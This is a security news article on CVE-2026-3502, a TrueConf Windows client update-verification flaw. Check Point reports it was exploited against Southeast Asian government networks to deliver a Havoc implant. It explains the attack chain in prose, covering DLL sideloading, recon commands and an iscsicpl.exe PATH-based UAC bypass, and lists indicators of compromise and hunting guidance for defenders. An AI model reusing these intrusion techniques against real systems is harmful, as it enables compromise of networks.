TrueConf Zero-Day Exploited in Southeast Asia to Push Havoc via Trusted Update Channel

By Ash K
TrueConf Zero-Day Exploited in Southeast Asia to Push Havoc via Trusted Update Channel

Check Point Research has disclosed a zero-day vulnerability in the TrueConf client for Windows that was actively exploited against government targets in Southeast Asia, turning a trusted enterprise collaboration platform into a malware distribution channel. The campaign, dubbed Operation TrueChaos, abused the software’s update mechanism to push a weaponized client package to connected endpoints and ultimately deploy what researchers assess was a Havoc implant.

The flaw is tracked as CVE-2026-3502 and carries a CVSS score of 7.8. At a high level, the issue is not a memory corruption bug or a parser crash. It is a trust-boundary failure in the update workflow. According to Check Point and the CVE record, the TrueConf client downloads and applies update code from the connected on-premises TrueConf server without performing sufficient integrity or authenticity verification. If an attacker controls that on-prem server, or can influence the update delivery path, they can substitute a malicious executable and have it delivered as though it were a legitimate client update.

That design choice is what makes the bug dangerous in enterprise and government environments. TrueConf is often deployed as an on-premises video conferencing platform inside private networks, including secure or disconnected environments. In those architectures, the central server is implicitly trusted by every connected client. Check Point says the attackers exploited exactly that trust relationship, replacing the normal update package on a government-operated TrueConf server and pushing the malicious version to multiple agencies that relied on the same infrastructure.

The attack chain is technically interesting because it blended software-update abuse with classic loader tradecraft. Check Point says the victim launched the already-installed TrueConf client, likely via a malicious link, and was shown a routine upgrade prompt. The downloaded installer appeared legitimate and even upgraded the client from 8.5.1 to 8.5.2, but it also dropped a benign poweriso.exe and a malicious 7z-x64.dll into C:\ProgramData\PowerISO\. The DLL was then loaded through DLL sideloading, giving the attackers code execution under the cover of an otherwise normal-looking application path.

From there, the operators moved into hands-on-keyboard activity. Check Point observed reconnaissance commands such as tasklist > cache and tracert 8.8.8.8 -h 5, followed by the download of an archive from an attacker-controlled FTP server. The archive contained a legitimate 7z.exe and a malicious iscsiexe.dll, which the attackers used as part of a UAC bypass chain involving the auto-elevated Microsoft iSCSI Initiator Control Panel binary iscsicpl.exe. The trick worked by modifying the current user’s PATH environment variable so Windows would resolve the attacker’s DLL first when the elevated process launched.

The post-compromise logic suggests a tightly scoped operational toolset rather than noisy commodity malware. Check Point describes iscsiexe.dll as a custom persistence and privilege-escalation component whose primary purpose was to maintain execution of the renamed poweriso.exe binary, called winexec.exe in the flow the researchers reconstructed. Check Point did not recover the exact final-stage payload from the compromised hosts, but observed network traffic to attacker infrastructure that was running Havoc C2 and matched that infrastructure to a Havoc demon sample. Based on that combined evidence, the researchers assess with high confidence that the end payload was a Havoc implant.

The campaign’s strategic significance comes from its scale and targeting model. The attackers did not have to compromise each workstation separately. They compromised or controlled the central on-premises TrueConf server, replaced the client update package stored under C:\Program Files\TrueConf Server\ClientInstFiles\, and then let the product’s own update process distribute the weaponized binary to downstream endpoints. That turns a routine maintenance feature into a trusted malware broadcast mechanism. In government networks where the same collaboration server is shared by multiple entities, the result is effectively a one-to-many infection path.

Check Point assesses with moderate confidence that the operation is linked to a Chinese-nexus threat actor. The attribution is based on the campaign’s victimology, the regional focus, the use of DLL sideloading, and command-and-control infrastructure hosted on providers such as Alibaba Cloud and Tencent. The researchers also note that the same victim was targeted in the same timeframe by ShadowPad, which may suggest shared access, overlapping operators, or parallel targeting by China-aligned actors. That is still an assessment rather than a formal attribution claim.

TrueConf has since addressed the issue. Check Point says the fix is included in the TrueConf Windows client starting with version 8.5.3, released in March 2026. The CVE record and third-party vulnerability trackers describe the affected range as TrueConf Client for Windows 8.1.0 through 8.5.2. Organizations running on-premises TrueConf should treat any pre-8.5.3 Windows client estate as potentially exposed if the server trust model was abused.

Indicators of Compromise (IoCs)

  • Malicious update executable: trueconf_windows_update.exe — MD5: 22e32bcf113326e366ac480b077067cf
  • Loader DLL: iscsiexe.dll — MD5: 9b435ad985b733b64a6d5f39080f4ae0
  • Havoc implant DLL: 7z-x64.dll — MD5: 248a4d7d4c48478dcbeade8f7dba80b3
  • C2 infrastructure: 43.134.90[.]60, 43.134.52[.]221, 47.237.15[.]197
  • Malware staging path: C:\ProgramData\PowerISO\poweriso.exe
  • Autorun persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck pointing to C:\ProgramData\PowerISO\PowerISO.exe
  • Possible dropped artifacts: %AppData%\Roaming\Adobe\update.7z, 7za.exe, iscsiexe.dll, rom.dat
  • Suspicious process chain: trueconf.exe → trueconf_windows_update.exe → trueconf_windows_update.tmp → any executable
  • Behavioral detections: poweriso.exe spawning cmd.exe, especially with curl, winrar.exe, or netstat in the command line

Hunting and response guidance

Defenders should start by validating the update path rather than focusing only on endpoints. If an on-premises TrueConf server was compromised or tampered with, every connected client may have been exposed. Check Point recommends treating systems as potentially infected if they contain an unexpected unsigned trueconf_windows_update.exe, the C:\ProgramData\PowerISO\ path, or the autorun registry value used for persistence. Hunting should include file creation from trueconf_windows_update.tmp into the PowerISO directory, suspicious child processes from poweriso.exe, and evidence of the iSCSI UAC-bypass chain involving iscsicpl.exe and iscsiexe.dll.

The bigger lesson is that update channels inside private networks can become some of the most dangerous supply-chain paths in an organization. In this case, the attacker did not need an internet-facing exploit for every endpoint. They needed the ability to influence one trusted server and one weak update-validation design. Once those conditions were met, the platform’s own management logic became the distribution mechanism. That is what makes Operation TrueChaos a high-value case study for defenders protecting government, defense, and critical infrastructure environments built around centrally managed on-prem software.

Reference Links and Sources

Ash K
Ash K
Ashton is a seasoned Cybersecurity Professional with over 25 years of experience in Cybersecurity Research, Cybersecurity Incident response, Products and Security Solutions architecture.